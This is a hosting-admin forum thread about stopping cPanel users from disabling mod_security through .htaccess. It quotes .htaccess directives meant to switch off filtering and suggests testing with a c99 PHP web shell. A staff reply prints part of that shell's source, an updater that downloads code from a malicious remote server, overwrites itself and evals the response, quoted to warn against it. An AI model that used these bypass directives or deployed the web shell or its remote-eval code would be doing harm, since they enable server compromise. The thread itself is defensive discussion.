How to disable overriding mod_security config via .htaccess

[voshka]

Hi

if a user wanted to break the server he could easily bypass the rules by easily opening a .htaccess and
write the following into it
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

or maybe a hacker could bypass it too

so it is wise to disable the overriding functionality by user access

I have searched a lot and found out the way that is
/usr/local/apache/bin/apxs -D DISABLE_HTACCESS_CONFIG -cia mod_security.c

I could be able to compile it with some of the mod_security.c that related to 1.9.5 version
but as it was too old some errors occurred

Syntax error on line 10 of /usr/local/apache/conf/modsec2.user.conf:
Invalid parts specification for SecAuditLogParts: ABIFHZ
httpd not running, trying to start
[root@box1 modsec_rules]# nano /usr/local/apache/conf/modsec2.user.conf

I tried recompiling with the latest 2.6.6 but it get compilation errors


So my question is that is it possible to just compile what wasyapache has done with disabling the .htaccess module or I have to reinstall and compile modsecurity by hand from the first and i wanted some guide and instructions on version 2.6.6

Thanks

[NetMantis]

I generally first setup mod_security with EasyApache and the manually recompile and install mod_security over and replacing the Cpanel installation patched instead to disallow .htaccess overrides.

It would be very nice if Cpanel had that setup in EasyApache by default but at this time that's how I have to do it.

If you want to be particularly nasty, you could write a quick simple script to grep all the .htaccess files for "SecFilterEngine" or "mod_security.c" and automatically suspend any accounts where it is found.

[cPanelTristan]

If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house.

The only reason a site owner might do it would be because the rules being used are impacting a page or pages displaying, and then most users wouldn't be aware of how to even do it.

If you would like to see this option available, it would be best to post a feature request to change the configuration option:

Feature Requests for cPanel & WHM

[voshka]

for finding all I used

find /home2 -type f -name ".htaccess" -print0 | xargs -0 grep -l "SecFilterScanPOST"

this will all .htacceses that contains SecFilterScanPOST

the thing is that we dont want allowing users to manually edit .htaccesses that allow hackers intrude the system
it is not the hacker that could be able to change .htaccess

Thanks

- - - Updated - - -

@NetMantis
could you please provide me details of how to implement this?

Thanks

[NetMantis]

If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house

You very clearly missed the whole point entirely!

We aren't talking about hackers or anyone already hacking the accounts.

We are discussing preventing a security vulnerability from being opened that could lead to hacking.

What I was talking about doing above was auto suspended users who attempt to bypass mod_security not as a means of making anything more secure (I already have it locked out physically impossible to do that anyway) but rather to get the immediate undivided attention of any user who tries to do so!

With the .htaccess options disabled in the compile for mod_security, the user couldn't do anything anyway but I want them to know that they should not be trying to disable it and that I know that they made the attempt to do so!

the thing is that we dont want allowing users to manually edit .htaccesses that allow hackers intrude the system
it is not the hacker that could be able to change .htaccess

It would seem that voshka understood the whole exact point precisely!

@NetMantis
could you please provide me details of how to implement this?

Sure, no problem! I'll shoot you over a private message with my contact info and we can get together on this.

I'll be out and about most of the day today after this morning but I should be back this evening and will also be around all day long tomorrow so whenever you can catch up to me on that, I'd be happy to give you a hand.

[cPanelTristan]

Again, if this is important to you, you would want to open up a feature request. You might link to it in this thread if you've done so for others who run into the topic to post onto that feature request.

[borgia]

Yeah right, Mod_security 2 cannot be disabled from .htaccess.
(only from httpd.conf).

So relax....

[voshka]

it actually can
Please make a test and put this into one of the domains .htaccess and upload and test a shell in that directo

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

or

<IfModule mod_security2.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

[borgia]

I am sorry what do you mean by "test a shell in that directory" ? I tested in browser and everything is working, mod_security wasn't disabled.

Regards

[voshka]

I am sorry what do you mean by "test a shell in that directory" ? I tested in browser and everything is working, mod_security wasn't disabled.

Regards

I mean to upload a php shell let say c99 php shell or the rest
put that in the .htaccess and then use your brwoser to point to that php shell
it must be working if you pt that in .htaccess
and this disable all the mod_Security analyzing and filtering features

Thanks

[borgia]

I didn't test with that, I am using something else for those php shell to be automatically removed in the upload moment. But you can restrict those PHP shell to run only in user directory (open_basedir in your custom php.ini for each virtual host). So will be no harm for your server


Regards

[voshka]

If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house.

The only reason a site owner might do it would be because the rules being used are impacting a page or pages displaying, and then most users wouldn't be aware of how to even do it.

If you would like to see this option available, it would be best to post a feature request to change the configuration option:

Feature Requests for cPanel & WHM

Hi

I have already created a feature request for the main request of this thread
but I believe it has something to do with the mod_security itself to have disable module available in mod_security 2.6.6
Please if any body knows a fix help me to prevent disabling mod security using .htaccess

what CPanel Staff mentioned above is to some what true but a user could purchase service and his/her intention is to harm and easily disable mod security using .htaccess and harm the server
please help me

Thanks

[d'argo]

you cant disable modsec 2.6.6 via .htaccess. these arent even 2.x directives:

SecFilterEngine Off
SecFilterScanPOST Off

are you sure you arent talking bout an earlier version of modsec?

[cpCharlesB]

I mean to upload a php shell let say c99 php shell

Don't test with the C99 shell, most variants I have seen will automatically make connections and download updates from a remote (obviously malicious) server.

A typical example:

PHP Code:

$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 

$c99sh_updateurl = "http://crapsite.ru/update/c99shell/"; //Update server 
$c99sh_sourcesurl = "http://crapsite.ru/files/c99sh_sources/"; //Sources-server 


Here is the update function:

PHP Code:

if (!function_exists("c99sh_getupdate")) 
{ 
function c99sh_getupdate($update = TRUE) 
{ 
$url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
$data = @file_get_contents($url); 
if (!$data) {return "Can't connect to update-server!";} 
else 
{ 
  $data = ltrim($data); 
  $string = substr($data,3,ord($data{2})); 
  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
  if ($data{0} == "\x99" and $data{1} == "\x03") 
  { 
   $string = explode("\x01",$string); 
   if ($update) 
   { 
    $confvars = array(); 
    $sourceurl = $string[0]; 
    $source = file_get_contents($sourceurl); 
    if (!$source) {return "Can't fetch update!";} 
    else 
    { 
     $fp = fopen(__FILE__,"w"); 
     if (!$fp) {return "Local error: can't write update to ".__FILE__."!
                    You may download c99shell.php manually 
                    <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
    } 
   } 
   else {return "New version are available: ".$string[1];} 
  } 
  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
} 
} 
} 


Whatever gets downloaded in this update is probably not something you want.

There are better ways to do this....